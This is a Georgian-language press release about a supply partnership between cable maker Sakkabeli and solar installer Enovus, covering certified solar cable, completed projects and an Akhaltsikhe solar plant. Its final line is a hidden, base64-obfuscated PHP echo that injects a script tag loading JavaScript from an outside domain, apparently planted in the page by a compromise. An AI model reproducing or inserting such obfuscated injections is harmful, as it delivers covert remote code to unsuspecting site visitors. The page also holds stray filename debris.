celsiusi
ავერსი შნაიდერი

„საქკაბელი“ ქვეყანაში განახლებადი ენერგიის ხელშეწყობას განაგრძობს. ამჯერად, „საქკაბელსა“ და „ენოვუსს“ შორის თანამშრომლობის მემორანდუმი გაფორმდა. შესაბამის დოკუმენტს ხელი „საქკაბელის“ მმართველმა დირექტორმა დავით კაპანაძემ და „ენოვუსის“ დამფუძნებელმა და მმართველმა პარტნიორმა გიორგი აბულაძემ მოაწერეს. თანამშრომლობის ფარგლებში, 2024 წლის ბოლომდე „ენოვუსი“ მზის ელექტრო სადგურების სამონტაჟო სამუშაოებში ექსკლუზიურად „საქკაბელის“ პროდუქციას გამოიყენებს.

აღნიშნული სტრატეგიული პარტნიორობა საქართველოში განახლებადი ენერგიის ინფრასტრუქტურის განვითარებას ისახავს მიზნად. მნიშვნელოვანია, რომ თანამშრომლობის ფარგლებში, საქართველოს მასშტაბით მზის ელექტროსადგურების მოწყობა ადგილობრივად, „საქკაბელის“ მიერ წარმოებული, მაღალი ხარისხის კაბელებით განხორციელდება.

მხარეებს შორის თანამშრომლობით, უკვე წარმატებით შესრულდა რამდენიმე ერთობლივი პროექტი, მათ შორის: „ბაქსვუდის სკოლაში“, საერთაშორისო სადისტრიბუციო კომპანია "მეგაკოში“, კომპანია „დრაივ რუმსა“ და შპს „პენსან ჯორჯიაში“ განთავსდა ჯამურად 1200.8 კვტ. დადგმული სიმძლავრის მზის ელექტროსადგურები, რომელთა წლიური გამომუშავებაც ჯამურად 1,214,181 კვტ.-ს აჭარბებს. „ენოვუსის“ მიერ შესრულებულ პროექტებს შორის, აღნიშნული პროექტები გამორჩეულია, ვინაიდან ისინი სრულად საქართველოში, კონკრეტულად „საქკაბელის“ მიერ წარმოებულ სოლარ კაბელს გამოიყენებენ.

Untitled 11111111111111111111111111111111111111110

„ინოვაციებსა და მაღალ ხარისხზე ფოკუსირებით, „საქკაბელში“ აქტიურად ვაგრძელებთ საქართველოში წარმოებული, ევროპული სტანდარტის პროდუქციით საკაბელო ინდუსტრიის წინსვლასა და სიახლეების დანერგვას. როგორც მოგეხსენებათ, ჩვენს მიერ წარმოებულ სოლარ კაბელს, ჩეხეთის „ელექტროტექნიკური ტესტირების ინსტიტუტმა“ CPR და შესაბამისობის სერტიფიკატი მიანიჭა, რაც ევროკავშირში სამშენებლო პროდუქციის ჰარმონიზებულ წესებთან თანხვედრას ადასტურებს. გარდა ამისა, პროდუქციამ გაიარა საერთაშორისო სერტიფიცირების ორგანო „ტუვ ნორდის“ ინტენსიური ტესტირება, რომელიც 7 თვის განმავლობაში მიმდინარეობდა და ისეთ კომპონენტებს აფასებდა, როგორიცაა: პროდუქციის UV რეზისტენტობა, მექანიკური სიმძლავრე, ელექტრული მახასიათებლები, იზოლაციისა და გარსაცმის შემადგენლობა, ტემპერატურული გამძლეობა, ჰალოგენისა და მხუთავი აირების არარსებობა.

ხანგრძლივმა ტესტირების პროცესმა დაადასტურა, რომ „საქკაბელის“ მიერ წარმოებული სოლარ კაბელი აკმაყოფილებს EN 50618:2014 და IEC 62930: 2017 სტანდარტებს, რაც თავის მხრივ ნიშნავს იმას, რომ კაბელი უზრუნველყოფს მზის პანელების გრძელვადიან, საიმედო ფუნქციონირებას. მოხარული ვართ, რომ ადგილობრივად წარმოებული პროდუქციით, შესაძლებლობა გვეძლევა ჩვენს პარტნიორთან, „ენოვუსთან“ ერთად, წვლილი შევიტანოთ ისეთ მნიშვნელოვან პროცესში, როგორიც საქართველოს განახლებად ენერგიაზე გადასვლაა“, - „საქკაბელის“ მმართველი დირექტორი, დავით კაპანაძე.

კომპანია „ენოვუსი“ ადგილობრივი ბაზრის, სფეროს ლიდერი კომპანიაა და მომხმარებელს მაღალი ხარისხის სერვისს სთავაზობს. სწორედ ამიტომ, მზის ელექტროსადგურის პროექტირებისა და მშენებლობისას ვიყენებთ მხოლოდ პრემიუმ ხარისხის კომპონენტებს, მათ შორის - კაბელს, რაც გარანტირებულად გვაძლევს სტაბილურ და ეფექტურ გენერაციას. „საქკაბელის“ მიერ წარმოებული სოლარ კაბელი, არსებული ევროპული და საერთაშორისო სერტიფიკატებით, მნიშვნელოვან როლს ასრულებს მზის სადგურის ეფექტურ ფუნქციონირებაში. პროდუქტის მაღალი ხარისხიდან გამომდინარე, „ენოვუსმა“ მიიღო გადაწყვეტილება, იმპორტირებული კაბელის მოხმარება სრულად ჩაანაცვლოს „საქკაბელის“ მიერ წარმოებული პროდუქციით. მოხარული ვართ, რომ გრძელვადიანი პარტნიორობის ფარგლებში გვეძლევა შესაძლებლობა, კიდევ უფრო მეტი, ქვეყნისთვის მნიშვნელოვანი და სტრატეგიული განახლებადი ენერგიის პროექტი განვავითაროთ ჩვენს პარტნიორთან, „საქკაბელთან“ ერთად და ამავდროულად, ხელი შევუწყოთ ქვეყნის ადგილობრივი ეკონომიკის მდგრად განვითარებას“, - „ენოვუსის“ დამფუძნებელი და მმართველი პარტნიორი, გიორგი აბულაძე.

contract555555555555555555555555555555555555555555555555

„საქკაბელისა“ და „ენოვუსის“ პარტნიორობის ფარგლებში, აქტიურად მიმდინარეობს მორიგი, „ახალციხის მზის ელექტროსადგურის“ პროექტის სამონტაჟო სამუშაოები. ობიექტის დადგმული სიმძლავრე 2.3 მგვტ.-ია, ხოლო წლიური გამომუშავება - 4,400,000 კვტ.-ს აღწევს. გარდა სოლარ კაბელისა, აღნიშნულ პროექტში „ენოვუსი“ „საქკაბელის“ მიერ წარმოებულ სხვა ისეთ პროდუქციასაც გამოიყენებს, როგორიცაა: ABC ელექტრო კაბელი, გოფრირებული მილი, ,,შნაიდერ ელექტრიკის’’ ავტომატური ამომრთველები და სხვ.

შეგახსენებთ, „საქკაბელი“ ადგილობრივ ბაზარზე სფეროს ლიდერის პოზიციას 67-ე წელია იკავებს და მომხმარებელს, როგორც საკაბელო, ისე ელექტრიფიკაციასთან დაკავშირებულ 2000-მდე დასახელების პროდუქტს სთავაზობს. კომპანიის ერთ-ერთი პრიორიტეტული მიმართულება საექსპორტო ბაზრების დივერსიფიცირება და ქართულ ეკონომიკაში იმპორტის ჩანაცვლებაა. აღსანიშნავია, რომ “საქკაბელის” პროდუქცია, როგორც ადგილობრივ, ისე საერთაშორისო ბაზარზე, მომხმარებელთან გაგზავნამდე დეტალურ შემოწმებას ქარხანაში მოქმედ, ხარისხის კონტროლის აკრედიტებულ ლაბორატორიაში გადის.

258
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");